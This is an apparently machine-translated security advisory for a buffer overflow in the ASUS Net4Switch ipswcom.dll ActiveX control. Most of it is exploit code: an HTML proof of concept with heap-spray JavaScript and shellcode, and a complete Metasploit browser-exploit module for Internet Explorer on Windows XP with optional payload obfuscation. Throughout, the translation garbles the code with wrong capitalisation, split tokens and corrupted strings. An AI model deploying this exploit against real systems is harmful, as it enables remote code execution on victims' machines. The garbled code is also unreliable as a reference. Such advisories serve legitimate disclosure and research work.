ASUS Net4Switch 'ipswcom. dll 'ActiveX Remote Denial of Service Vulnerability
Release date:
Updated on:
Affected Systems:
Asus Net4Switch ipswcom. dll 1.0.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52110
ASUS Net4Switch is the network management software on ASUS computers.
The ASUS Net4Switch ipswcom. dll component has a buffer overflow vulnerability. Remote attackers can execute arbitrary code through specially crafted html webpages.
<* Source: Dmitriy Evdokimov
Link: http://www.dsecrg.com/pages/vul/show.php? Id = 417
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Dmitriy Evdokimov () provides the following test methods:
<HTML>
<HEAD>
<TITLE> DSecRG: Asus exploit by EvdokimovDS </TITLE>
</HEAD>
<BODY>
<OBJECT id = 'vuln' classid = 'clsid: 1b9e86d8-7caf-46c8-9938-417b21e17a8e '> </object>
<SCRIPT>
Function Exploit ()
{
// Shellcode & #65533; exec notepad
Var shell = unescape ("% ue8fc % u0089 % u0000 % u8960 % u31e5 % u64d2 % u528b % u8b30 %
U0c52 % u528b % u8b14 % u2872 % ub70f % u264a % uff31 % uc031 % u3cac % u7c61
% U2c02 % uc120 % u0dcf % uc701 % uf0e2 % u5752 % u528b % u8b10 % u3c42 % ud00
1% u408b % u8578 % u74c0 % u014a % u50d0 % u488b % u8b18 % u2058 % ud301 % u3c
E3 % u8b49 % u8b34 % ud601 % uff31 % uc031 % uc1ac % u0dcf % uc701 % ue038 % uf
475% u7d03 % u3bf8 % u247d % ue275 % u8b58 % u2458 % ud301 % u8b66 % u4b0c % u
588b % u011c % u8bd3 % u8b04 % ud001 % u4489 % u2424 % u5b5b % u5961 % u515a %
Ue0ff % u5f58 % u8b5a % ueb12 % u5d86 % u016a % u858d % u00b9 % u0000 % u6850
% U8b31 % u876f % ud5ff % ue0bb % u2a1d % u680a % u95a6 % u9dbd % ud5ff % u063
C % u0a7c % ufb80 % u75e0 % ubb05 % u1347 % u6f72 % u006a % uff53 % u6ed5 % u74
6f % u7065 % u6461 % u0000 ");
// Heap-spray
Var bigbk = unescape ("% u9090 % u9090 % u9090 % u9090 ");
While (bigbk. Size <0x40000) bigbk = bigbk + bigbk;
Var mem = new Array ();
For (I = 0; I <400; I ++) mem [I] = bigbk + shell;
// Buffer overflow
Var bf = unescape ("% u0d0d % u0d0d ");
Var buf = "";
While (buf. length <8000) buf = buf + bf;
Vuln. Alert (buf );
}
Exploit ();
</SCRIPT>
</BODY>
</HTML>
##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##
Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = NormalRanking
Include Msf: Exploit: Remote: HttpServer: HTML
Def initialize (info = {})
Super (update_info (info,
'Name' => "ASUS Net4Switch ipswcom. dll ActiveX Stack Buffer Overflow ",
'Description' => % q {
This module exploits a vulnerability found in ASUS Net4Switch's ipswcom. dll
ActiveX control. A buffer overflow condition is possible in multiple places all
Because of the poor use of the cxdbuplint () function, which allows remote attackers
To gain arbitrary code execution under the context of the user.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Dmitriy Evdokimov ', # Initial discovery, poc
'Sinr3' # Metasploit
],
'References '=>
[
['Ossvdb', 'HTTP: // osvdb.org/show/osvdb/79438'],
['Url', 'HTTP: // dsecrg.com/pages/vul/show.php? Id = 417 ']
],
'Payload' =>
{
'Badchars' => "\ x00 ",
'Stackadjustment' =>-3500,
},
'Defaultopexception' =>
{
'Exitfunction' => "seh ",
'Initialautorunscript' => 'migrate-F ',
},
'Platform' => 'win ',
'Targets' =>
[
['Automic ', {}],
['Ie 6 on Windows XP SP3 ', {'max' => '0x40000', 'offset '=> '0x500'}],
['Ie 7 on Windows XP SP3 ', {'max' => '0x40000', 'offset '=> '0x500'}]
],
'Privileged' => false,
'Disclosuredate' => "Feb 17 2012 ",
'Defaulttarget' => 0 ))
Register_options (
[
OptBool. new ('obfuscate', [false, 'Enable JavaScript obfuscation'])
], Self. class)
End
Def get_target (agent)
Return target if target. name! = 'Automic'
If agent = ~ /NT 5 \. 1/and agent = ~ /MSIE 6/
Return targets [1] # IE 6 on Windows XP SP3
Elsif agent = ~ /NT 5 \. 1/and agent = ~ /MSIE 7/
Return targets [2] # IE 7 on Windows XP SP3
Else
Return nil
End
End
Def on_request_uri (cli, request)
Agent = request. headers ['user-agent']
My_target = get_target (agent)
If my_target.nil?
Print_error ("Browser not supported: # {agent. to_s }:#{ cli. peerhost }:# {cli. peerport }")
Send_not_found (cli)
Return
End
P = payload. encoded
Js_code = Rex: Text. to_unescape (p, Rex: Arch. endian (target. arch ))
Nops = Rex: Text. to_unescape (make_nops (4 ))
Spray = <-JS
Var heap_obj = new heapLib. ie (0x20000 );
Var code = unescape ("# {js_code }");
Var nops = unescape ("# {nops }");
While (nops. length <0x80000) nops + = nops;
Var offset = nops. substring (0, # {my_target ['offset']});
Var shellcode = offset + code + nops. substring (0, 0x800-code.length-offset.length );
While (shellcode. length <0x40000) shellcode + = shellcode;
Var block = shellcode. substring (0, (0x80000-6)/2 );
Heap_obj.gc ();
For (var I = 1; I <0x300; I ++ ){
Heap_obj.alloc (block );
}
JS
Spray = heaplib (spray, {: noobfu => true })
Js = <-JS
Var obj = new ActiveXObject ("ipswcom. IPSWComItf ");
# {Spray}
Function generate_padding (d, s ){
Var tmp = d;
While (tmp. length <s ){
Tmp + = tmp;
}
Var buf = tmp. substring (0, s/2 );
Tmp = null;
Return buf;
}
Var arg1 = generate_padding (unescape ("% u4141"), 4 );
Var arg2 = "A"; // Expands to 0x0041, helps us to align the stack
Arg2 + = generate_padding ("% u4343"), 2680 );
Arg2 + = unescape ("% u1_2 % u1_2 ");
Arg2 + = unescape ("% u0d0d % u0d0d ");
Arg2 + = generate_padding (unescape ("% u0d0d"), # {my_target ['max ']}-arg2.length );
Obj. MsgBox (arg1, arg2, 2 );
JS
# Obfuscate on demand
If datastore ['obscate']
Js =: Rex: Exploitation: JSObfu. new (js)
Js. obfuscate
End
Html = <-EOS
<Html>
<Head>
</Head>
<Body>
<Script>
# {Js}
</Script>
</Body>
</Html>
EOS
Html = html. gsub (/\ t /,'')
Print_status ("Sending html to # {cli. peerhost }:# {cli. peerport }...")
Send_response (cli, html, {'content-type' => 'text/html '})
End
End
= Begin
Download:
Http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html
Clsid: 1b9e86d8-7caf-46c8-9938-417b21e17a8e
C: \ Program Files \ ASUS \ Net4Switch \ ipswcom. dll
. Text: 10030523 push ecx
. Text: 10030524 mov eax, [ebp + arg_C]
. Text: 10030527 mov [ebp + var_4], eax
. Text: 1003052A cmp [ebp + var_4], 0
. Text: 1003052E jz short loc_10030541 <-- uType 10 h
. Text: 10030530 cmp [ebp + var_4], 1
. Text: 10030534 jz short loc_10030573 <-- uType 44 h
. Text: 10030536 cmp [ebp + var_4], 2
. Text: 1003053A jz short loc_100305A5 <-- cxdbuplint
...
. Text: 100305A5 loc_100305A5:; code xref: MsgBox + 1Aj
. Text: 100305A5 mov eax, [ebp + lpText]
. Text: 100305A8 push eax
. Text: 100305A9 push offset aIpsw_alertS; "[IPSW_alert] = % s"
. Text: 100305AE push 0FFh
. Text: 100305B3 call ds: cxdbuplint
= End
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Asus
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.asus.com.tw